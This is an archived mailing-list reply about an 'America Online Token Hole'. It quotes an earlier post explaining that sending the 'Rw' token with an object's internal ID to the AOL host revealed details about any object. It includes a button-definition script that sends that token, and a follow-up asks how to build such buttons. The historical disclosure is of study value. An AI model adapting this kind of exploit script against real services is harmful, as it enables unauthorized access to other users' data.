Re: America Online Token Hole

[granny () PINKFLOYD COM (John Schuster)]

I had contacted the person who posted this information.  It 
seems that AOL has contacted him and he refuses to talk 
about this if you ask about it.

Does anyone have any information on how to make your own 
programmable buttons for aol?

granny

About a year ago, I found out that by sending the "Rw" token 
to the AOL host while signed on along with the object's 
internal id as arg, any user could get detailed info about 
any object on the system.

man_start_object < trigger, "" >
mat_relative_tag < 22 >
act_replace_select_action
< 
uni_start_stream 
sm_send_token_arg <"Rw", INTERNAL ID HERE>
uni_end_stream 
<FONT COLOR="#222255">> </FONT>
mat_precise_x < 0 > 
mat_precise_y < 226 > 
mat_font_sis < small_fonts, 7, normal> 
mat_art_id < 1-0-21184 >
mat_bool_default < yes > 
man_end_object 

comments questions..   <A 
HREF="mailto:mackk () rpi edu">mackk () rpi edu</A>